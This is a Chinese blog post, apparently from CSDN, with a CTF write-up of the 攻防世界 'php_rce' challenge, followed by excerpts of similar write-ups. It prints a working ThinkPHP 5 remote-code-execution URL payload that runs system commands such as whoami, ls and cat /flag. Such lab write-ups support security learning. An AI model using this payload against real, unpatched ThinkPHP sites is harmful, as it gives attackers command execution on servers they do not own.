攻防世界php_rce

最新推荐文章于 2024-08-06 10:24:03 发布

听门外雪花飞

最新推荐文章于 2024-08-06 10:24:03 发布

阅读量917

点赞数

分类专栏： ctf刷题纪文章标签： php 安全 web安全

本文链接：https://blog.csdn.net/weixin_52268949/article/details/122607472

版权

ctf刷题纪专栏收录该内容

48 篇文章 3 订阅

订阅专栏

php_rce

进入题目提示为ThinkPHP V5

在这里插入图片描述

遇到这种题我们一般去找一下框架的rce漏洞即可，搜索到这样一篇文章

https://www.freebuf.com/articles/web/289860.html

然后我们直接使用这里面的payload

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

成功rce

在这里插入图片描述

接下来就是找flag的游戏了，在根目录下发现了flag我们cat一下

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

听门外雪花飞

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【网络安全 | CTF】攻防世界 php_rce 解题详析

等风来

05-22

5918

PHP RCE 指的是通过远程代码执行漏洞（Remote Code Execution）来攻击 PHP 程序的一种方式。简单来说，由于PHP应用程序没有正确处理外部输入数据（如用户提交的表单、请求参数等），此时通过某些手段向 PHP 应用程序中注入恶意代码，然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知，flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试，根据提示，使用5.0.20版本的Payload。说明命令执行成功，接着抓取flag即可。

【攻防世界】三 --- php_rce

qq_43168364的博客

12-23

467

题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞，可以找到一些由于我们不知其具体的版本，随便找一个执行一下，这里选择第一个会显出了root 说明thinkphp的版本可能就是：5.0.22，在选择下面的命令执行paylaod执行可以执行命令执行find命令查找flag相关文件可以在根目录下找到flag文件使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22

参与评论您还未登录，请先登录后发表或查看评论

攻防世界web---php_rce

gongjingege的博客

07-09

511

php_rce 没有题目描述，直接打开链接看到这一脸懵，试了几种常用的方法，什么也没发现，于是从内容入手，百度一下thinkphp 5.0版本，发现这个版本存在远程执行命令的漏洞，对漏洞这方面不了解，网上查找一下这个版本的漏洞漏洞链接找到了payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 没有发现flag，于是

攻防世界——php_rce

qq_60905276的博客

11-11

1787

我看不懂，查一下资料发现ThinkPHP V5曾经出现一个漏洞，来学习一下。 ThinkPHP 5漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。看得出来程序没经过控制器进行过滤，所以可以用/来控制程序。搞不懂这个漏洞是怎么搞出来的，借用一下大神的答案。 ?

【攻防世界CTF|web方向】第六题：php_rce

最新发布

weixin_70825534的博客

08-06

990

该漏洞是由于ThinkPHP5在处理控制器传参时，没有对参数进行充分的过滤与验证，导致恶意用户可以通过提交恶意数据，构造出一个带有PHP函数的控制器方法，并通过URL参数的形式访问该方法，从而触发远程代码执行漏洞。2.本题学习目标：掌握框架漏洞，知道某个网页使用的框架版本，就可以去百度该版本的漏洞，网上一抓一大把，从而就能够利用该漏洞获得想要的信息。发现题目场景中的thinkPHP版本是v5.0.20，而我们找的这个漏洞是未知版本的，可能不属于当前网页版本的漏洞，所以页面错误！有跟flag相关的东西。

攻防世界-php_rce

m0_49025459的博客

12-21

279

在网络中，以http开头的链接都是绝对路径，绝对路径就是你的主页上的文件或目录在硬盘上真正的路径，绝对路径一般在CGI程序的路径配置中经常用到，而在制作网页中实际很少用到。2、绝对路径：就是你的主页上的文件或目录在硬盘上真正的路径。绝对路径就是你的主页上的文件或目录在硬盘上真正的路径，比如，你的Perl 程序是存放在 c:/apache/1、相对路径：顾名思义，相对路径就是相对于当前文件的路径。-bin 下的，那么 c:/apache/cgi-bin就是cgi-bin目录的绝对路径。：代表目前所在的目录。

php_rce(攻防世界）

m0_70819573的博客

02-20

298

2.关于thinkphp的框架漏洞，可以参考。1.打开主页，提示了thinkphp版本较低。poc和exp有一大堆。

php_rce-攻防世界

szhangliwenya的博客

03-26

925

该漏洞是由于ThinkPHP5在处理控制器传参时，没有对参数进行充分的过滤与验证，导致恶意用户可以通过提交恶意数据，构造出一个带有PHP函数的控制器方法，并通过URL参数的形式访问该方法，从而触发远程代码执行漏洞。远程命令/代码执行漏洞，简称RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。参数通常用于指定ThinkPHP框架中的模块/控制器/方法。服务器没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令。查看 flag目录下的文件。

【攻防世界】三、php_rce

Hi~ 土拨鼠

01-20

377

步骤打开所给的实验环境：发现版本信息为ThinkPHP V5，我们在GitHub上查找一下这个版本有什么漏洞：发现它有代码执行漏洞：我们打开第一个看一下：由于我们不知道具体的版本，我们就使用5.0.22第一个poc来验证一下：发现页面显示出来了root，猜测可能就是这个版本的，然后使用远程代码执行的payload：发现可以执行成功：然后我们使用find命令来查找flag：查看网页源代码看起来整洁一点：在根目录下发现flag文件，使用cat命令查看文件内容：得到flag.

攻防世界 web进阶 php_rce 【远程命令执行 thinkphp5 rce漏洞】

Hrain7的博客

11-15

939

是远程命令执行 thinkphp5 rec漏洞具体执行语句可参考大佬的博客 ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园其实就在网上搜一下thinkphp5 rec漏洞改一下payload 就行 ...

【攻防世界】php_rce （ThinkPHP5）

2302_79800344的博客

04-09

891

【代码】【攻防世界】php_rce （ThinkPHP5漏洞）

攻防世界 php_rce

qq_53030229的博客

11-03

1975

ThinkPHP V5.0漏洞利用一、ThinkPHP V5.0漏洞1、审查源码2、ThinkPHP V5.0漏洞利用笔记：作为新手，感觉这些题目真的不友好，看得懂方法，不知道原理，好好学吧！(＃￣～￣＃) 一、ThinkPHP V5.0漏洞 1、审查源码首先，我的思路是检查源码和抓包，但是都没有收获 2、ThinkPHP V5.0漏洞利用 1、在没有任何思路的情况下，我把ThinkPHP V5.0粘贴到网页上查看，找到了ThinkPHP V5.0漏洞利用 http://111.200.241.244

攻防世界php-rce

evil_ming的博客

05-14

215

百度一下thinkphp，找到几个get传参的webshell漏洞，直接cv过来一个个试 s=index/think\App/invokeFunction&fun ction=call_user_func_array&vars[0]=sys tem&vars[1][]=命令先试试dir来查看包含的文件没有看见我们喜闻乐见的flag.txt，又不想一个个file的找，那就现学现卖一个新命令直接去找flag文件 s=index/think\App/inv...

php_rce(攻防世界lv.2)

qq_66013948的博客

10-25

363

可以看到当前目录内的文件，既然这样能够成功，那么我们就可以试着把退回根目录找有关flag的文件夹或者文件，最后在根目录上找的了个flag的文件夹，之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞，可以去。里面看有关漏洞的分析，通常构造的payload为。可以看到flag了。

攻防世界-php_rce（远程执行漏洞）

m0_62094846的博客

12-21

1421

打开可以看到一个比较真实的网站，也有超链接可以连接到其他的网站看到ThinkPHP就可以想到远程执行漏洞（看wp）语句： index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php代码 index.php?s=index/\think\app/invokefunction&function=call_use...

攻防世界-Web-php_rce

uh_eng的博客

08-05

611

0x01 打开题目，很明显是ThinkPHP5框架，这里就联想到ThinkPHP5的著名漏洞，再加上题目中的RCE（远程代码执行）解题思路基本就有了。关于ThinkPHP5的这个漏洞，可以参考:ThinkPHP5 RCE漏洞重现及分析 0x02 使用payload验证一下漏洞： /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=